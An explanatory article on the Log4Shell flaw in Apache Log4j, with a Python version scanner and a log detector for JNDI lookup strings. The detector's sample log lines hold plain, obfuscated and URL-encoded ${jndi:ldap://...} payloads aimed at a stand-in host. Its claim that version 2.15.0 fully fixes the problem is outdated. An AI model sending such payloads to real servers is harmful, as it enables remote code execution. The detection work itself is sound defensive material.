What is Log4Shell
It is a vulnerability that affects the popular Java logging library Log4j, developed by Apache. It is widely used in all kinds of services and software, for example in games like Minecraft as well as in cloud services. Applications use it to keep a record, or log, of what happens while they run.
We can say that this problem affects millions of servers worldwide, all of which are vulnerable and can be attacked remotely. By exploiting the Log4Shell flaw, an attacker could sneak malware in and take full control of the server; basically, he would have a free hand to do whatever he wanted.
The vulnerability has been registered as CVE-2021-44228 with a CVSS score of 10. To exploit it, the attacker simply needs the application to log a special string, a particular series of characters. Computer security researcher Matthew Prince, on his Twitter profile, reports evidence that the exploit was available at least 9 days before its publication, although there is no evidence that it had been widely used before then.
However, many attackers are now exploiting the Log4Shell vulnerability to carry out their attacks. They can, for example, install cryptocurrency miners on a server or turn affected devices into a botnet.
How to detect this vulnerability
Java is estimated to be present on some 3 billion devices worldwide. The vast majority of programmers use Log4j, so many systems may be vulnerable to this problem. Is it possible to know whether a system is vulnerable to Log4Shell? There are several ways to do it, and one of the simplest is to know the version of Log4j that you have installed. The vulnerable versions range from 2.0-beta9 to 2.14.1.
In addition, on GitHub we can find the steps to run commands and detect whether the vulnerability registered as CVE-2021-44228 is present or not. This Python-based scanner acts as a Log4Shell vulnerability detector.
We can say that the simplest way to detect whether a remote endpoint is vulnerable is to trigger a DNS query. What the exploit does is make the hypothetically vulnerable server try to fetch remote code. By using the address of a free DNS registration tool in the exploit chain, we can detect when the vulnerability is triggered. As Lunasec explains, we can use CanaryTokens for this.
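The version check described above, as an added example that is not part of the original article: the script below walks a directory tree for log4j-core jars, reads the version from the jar's file name (falling back to the jar's MANIFEST.MF, which is assumed to carry an Implementation-Version or Bundle-Version entry, as Maven-built jars usually do), and compares it against the range quoted here, 2.0-beta9 through 2.14.1 inclusive. It handles pre-release tags so that 2.0-beta9 and 2.0-rc1 are ordered correctly below 2.0.

```python
"""Check whether the Log4j 2 version on a host falls in the Log4Shell-affected range.

Added example, not from the article. It looks for log4j-core jars under a
directory, reads the version from the jar's file name (falling back to the
jar's MANIFEST.MF), and compares it with the range quoted above: 2.0-beta9
through 2.14.1 inclusive.
"""
import re
import sys
import zipfile
from pathlib import Path

# Matches 2.14.1, 2.0, 2.0-beta9, 2.0-rc1. Release builds get prerelease rank 3
# so that 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1 when the tuples are compared.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.IGNORECASE)
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}
_JAR_NAME_RE = re.compile(r"^log4j-core-(.+)\.jar$")


def parse_version(text):
    """Return a comparable tuple for a Log4j version string, or None if unparseable."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, pre, pre_num = m.groups()
    pre = pre.lower() if pre else None
    return (int(major), int(minor), int(patch or 0), _PRE_RANK[pre], int(pre_num or 0))


FIRST_VULNERABLE = parse_version("2.0-beta9")
LAST_VULNERABLE = parse_version("2.14.1")


def is_vulnerable_version(text):
    """True when the version lies inside the range the article gives for CVE-2021-44228."""
    v = parse_version(text)
    if v is None:
        raise ValueError(f"unrecognised Log4j version string: {text!r}")
    return FIRST_VULNERABLE <= v <= LAST_VULNERABLE


def version_from_name(filename):
    """Extract the version from a jar name such as log4j-core-2.14.1.jar, else None."""
    m = _JAR_NAME_RE.match(filename)
    return m.group(1) if m else None


def version_from_jar(path):
    """Version from the file name, else from the manifest (assumed to carry
    Implementation-Version or Bundle-Version; returns None if neither is found)."""
    ver = version_from_name(Path(path).name)
    if ver:
        return ver
    try:
        with zipfile.ZipFile(path) as jar:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (KeyError, zipfile.BadZipFile):
        return None
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key in ("Implementation-Version", "Bundle-Version"):
            return value.strip()
    return None


def scan_tree(root):
    """Return (path, version, vulnerable) for every log4j-core jar below root.
    vulnerable is None when the version could not be determined."""
    results = []
    for jar in sorted(Path(root).rglob("log4j-core*.jar")):
        ver = version_from_jar(jar)
        try:
            vulnerable = is_vulnerable_version(ver) if ver else None
        except ValueError:
            vulnerable = None
        results.append((str(jar), ver, vulnerable))
    return results


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, ver, vulnerable in scan_tree(root):
        status = {True: "VULNERABLE", False: "ok", None: "unknown version"}[vulnerable]
        print(f"{status:16} {ver or '?':10} {path}")
```

Run it with the application's installation directory as the argument. A jar it reports as "unknown version" still needs a manual look, and a jar that has been renamed or shaded into a fat jar will not be found by the file-name pattern at all, so treat a clean result as a first pass rather than proof.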
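A passive complement to the canary-DNS check above, added here as an example and not part of the original article or of the tools it mentions: rather than triggering the lookup, it searches logs the application already keeps for the lookup syntax that Log4j 2 evaluates, after undoing URL encoding and the simple nested lookups used to disguise the literal string. The access-log lines and the canary host name are constructed for the example.

```python
"""Flag web-server log lines that carry a Log4Shell-style JNDI lookup string.

Added example, not from the article. It searches existing logs for the
${jndi:...} syntax Log4j 2 evaluates, after undoing URL encoding and the
simple nested lookups used to disguise the literal string. The log lines
below are constructed for the example.
"""
import re
from urllib.parse import unquote

# ${lower:X} / ${upper:X} resolve to one character; ${anything:-X} resolves to
# its default value X. Collapsing these makes a disguised payload look like the
# plain form so a single pattern can match it.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}])\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Resolve innermost single-value lookups until the text stops changing."""
    for _ in range(max_rounds):
        step = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        step = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), step)
        if step == text:
            break
        text = step
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for each line containing a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(unquote(line))
        if _JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


# Constructed access-log lines: one benign request, one plain attempt, one
# disguised with nested lookups, one URL-encoded in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://canary.example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:J}ndi:${::-l}dap://canary.example.invalid/a}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcanary.example.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

A hit only shows that someone sent the string, not that the lookup was evaluated; pairing these matches with outbound LDAP or DNS traffic from the same host, or with a CanaryTokens alert, is what tells you the vulnerability actually fired.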
How to fix it on your system
If you know that your system is vulnerable and you want to protect it, there are different ways. The most recommended right now is to update Log4j to version 2.15.0, which fixes the problem. You can download it from the official Apache website. It is very important to always have the latest versions, and this is a clear example of why.
You can also consult the official Log4j security announcement, where you will find all the information on the steps to correct the vulnerability and install the necessary patches.
However, given the enormous importance of this security flaw, different options have arisen that act as “momentary patches” to correct, or at least reduce, the problem. An example is the script released by Cybereason, which relies on the vulnerability itself to disable a configuration setting on a remote, vulnerable Log4j instance.
Another temporary mitigation, until there was a patch, was to set the log4j2.formatMsgNoLookups system property to true when starting the Java virtual machine.
Ultimately, the Log4Shell vulnerability is very dangerous and has put millions of devices around the world at risk. It is essential to correct the problem as soon as possible and there is nothing better than updating to the latest version.